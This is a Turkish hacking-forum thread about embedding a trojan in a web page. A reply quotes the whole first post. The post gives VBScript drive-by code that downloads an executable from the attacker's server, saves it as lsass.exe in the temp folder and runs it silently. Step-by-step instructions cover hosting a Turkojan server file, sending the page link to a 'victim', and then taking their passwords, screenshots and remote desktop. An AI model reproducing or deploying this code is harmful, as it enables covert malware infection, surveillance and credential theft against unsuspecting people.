Web Sitesine trojan yerleştirme.

theraps

Üye
18 Tem 2010
103
0
Kod:
<script language="VBScript">
on error resume next
Set obj1 = ********.createElement("object")
obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
est1="Microsoft."&"_xmlHTTP"A
Set obj2 = obj1.CreateObject(est1,"")

est="Ado"&"db."&"Str"&"eam"
set obj3 = obj1.createobject(est,"")
obj3.type = 1
est2="GET"
obj2.Open est2, "Serverınızın linki", False
obj2.Send

set F = obj1.createobject("Scripting.FileSystemObject","")
set pasta = F.GetSpecialFolder(2)
fi="lsass.exe"
fi= F.BuildPath(pasta,fi)

obj3.open
obj3.write obj2.responseBody 
obj3.savetofile fi,2
obj3.close

set obj5 = obj1.createobject("Shell.Application","")

obj5.ShellExecute fi,"","","open",0
</script>







Merhaba arkadaşlar sizlere web sayfasına trojan gömmeyi anlatıcam.

Bu gördüğünüz kod sayesinde Yolu belirtilen serverımız siteye girilen kişinin bilgisayarı tarafından otomatik açılır.

Bu yöntem oldukça geçerlidir.Çünkü artık kimse msnde babasndan bile dosya almıyor.Ama sitede trojan olduğu çoğu kişinin hesabına gelmez.


Şimdi açıklamamı yapayım.

Serverınızın linki

Şimdi böyle bir kısım var.

Server nedir , Linkini nasıl alıcaz...

Server dediğimiz şey trojanlarda kendi bilgilerimizi ayarlayıp oluşturduğumuz dosyadır.Trojandan trojana özellikler değişir.Ama genelde mantık aynıdır.Karşı taraf exe yi açtığı zaman Bilgisayarında port açılır yani otomatik bi açık bırakılır.Ve bu sayede dosyayı yedirdiğimiz kişinin Ekranını bile izleyebiliriz.

Ben trojan olarak Turkojanı kullanıyorum.


Şimdi serverımızı oluşturduk diyelim Link nasıl alıcaz.
İlk önce bi web siteniz olması gerekiyor.Ücretsizde olabilir.

Örneğin Emre.com diye sitem olsun benim.

Ftp den bağlanıp benim server.exe mi anadizine atıyorum.

Ve link şöyle oluyor http://www.emre.com/server.exe

Buraya yüklendikten sonra internet explorerdan bu linki açıp kontrol ediyoruz.Bunu açtığınızda Çalıştır - Kaydet - İptal çıkar.Eğer çıkarsa olmuştur.Çıkmazsa sitenizin sunucusu güvenlik tarafından serverdaki exe uzantılarının çalıştırılmasını engellemiştir.Eğer öyleyse çalışmaz.
Yani serverınızı attığnız zaman mutlaka linke girdiğiniz zaman Çalıştır-Kaydet-İptal dalgası çıkması lazım.

Evet yapılacaklar bu kadar.

Özet olarak ; Servermızı oluşturduk ... server.exe
Sitemize upload ettik http://www.emre.com/server.exe oldu
Bu verdiğim kodları alın.Not defterine atın.
Kodun Serverınızın linki Kısmına "http://www.siteisminiz.com/server.exe"
yazın.Daha sonra farkı kaydet deyip.
.html uzantılı kaydedin.Mesela emre.html diye kaydettim.
o zmn http://www.emre.com/emre.html olur
Bu linki karşı tarafa attığım zaman.Kodlar sayesinde otomatik olarak ana dizindeki server.exe çalışacaktır.Ve Kurbanımız trojanı yemiş olacaktır.

Sonra şifreler, SS'ler, uzak masaüstü trojanınızın özelliğine göre kafanıza göre takılın.


KONU ALINTIDIR.
 

blink1337dagger

Kadim Üye
7 Kas 2011
5,261
42
Chicago İL
Kod:
<script language="VBScript">
on error resume next
Set obj1 = ********.createElement("object")
obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
est1="Microsoft."&"_xmlHTTP"A
Set obj2 = obj1.CreateObject(est1,"")

est="Ado"&"db."&"Str"&"eam"
set obj3 = obj1.createobject(est,"")
obj3.type = 1
est2="GET"
obj2.Open est2, "Serverınızın linki", False
obj2.Send

set F = obj1.createobject("Scripting.FileSystemObject","")
set pasta = F.GetSpecialFolder(2)
fi="lsass.exe"
fi= F.BuildPath(pasta,fi)

obj3.open
obj3.write obj2.responseBody 
obj3.savetofile fi,2
obj3.close

set obj5 = obj1.createobject("Shell.Application","")

obj5.ShellExecute fi,"","","open",0
</script>







Merhaba arkadaşlar sizlere web sayfasına trojan gömmeyi anlatıcam.

Bu gördüğünüz kod sayesinde Yolu belirtilen serverımız siteye girilen kişinin bilgisayarı tarafından otomatik açılır.

Bu yöntem oldukça geçerlidir.Çünkü artık kimse msnde babasndan bile dosya almıyor.Ama sitede trojan olduğu çoğu kişinin hesabına gelmez.


Şimdi açıklamamı yapayım.

Serverınızın linki

Şimdi böyle bir kısım var.

Server nedir , Linkini nasıl alıcaz...

Server dediğimiz şey trojanlarda kendi bilgilerimizi ayarlayıp oluşturduğumuz dosyadır.Trojandan trojana özellikler değişir.Ama genelde mantık aynıdır.Karşı taraf exe yi açtığı zaman Bilgisayarında port açılır yani otomatik bi açık bırakılır.Ve bu sayede dosyayı yedirdiğimiz kişinin Ekranını bile izleyebiliriz.

Ben trojan olarak Turkojanı kullanıyorum.


Şimdi serverımızı oluşturduk diyelim Link nasıl alıcaz.
İlk önce bi web siteniz olması gerekiyor.Ücretsizde olabilir.

Örneğin Emre.com diye sitem olsun benim.

Ftp den bağlanıp benim server.exe mi anadizine atıyorum.

Ve link şöyle oluyor http://www.emre.com/server.exe

Buraya yüklendikten sonra internet explorerdan bu linki açıp kontrol ediyoruz.Bunu açtığınızda Çalıştır - Kaydet - İptal çıkar.Eğer çıkarsa olmuştur.Çıkmazsa sitenizin sunucusu güvenlik tarafından serverdaki exe uzantılarının çalıştırılmasını engellemiştir.Eğer öyleyse çalışmaz.
Yani serverınızı attığnız zaman mutlaka linke girdiğiniz zaman Çalıştır-Kaydet-İptal dalgası çıkması lazım.

Evet yapılacaklar bu kadar.

Özet olarak ; Servermızı oluşturduk ... server.exe
Sitemize upload ettik http://www.emre.com/server.exe oldu
Bu verdiğim kodları alın.Not defterine atın.
Kodun Serverınızın linki Kısmına "http://www.siteisminiz.com/server.exe"
yazın.Daha sonra farkı kaydet deyip.
.html uzantılı kaydedin.Mesela emre.html diye kaydettim.
o zmn http://www.emre.com/emre.html olur
Bu linki karşı tarafa attığım zaman.Kodlar sayesinde otomatik olarak ana dizindeki server.exe çalışacaktır.Ve Kurbanımız trojanı yemiş olacaktır.

Sonra şifreler, SS'ler, uzak masaüstü trojanınızın özelliğine göre kafanıza göre takılın.


KONU ALINTIDIR.

yıl 2003 falan efsane idi sonra sorgusuz jawa dowloanderler çıktı
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.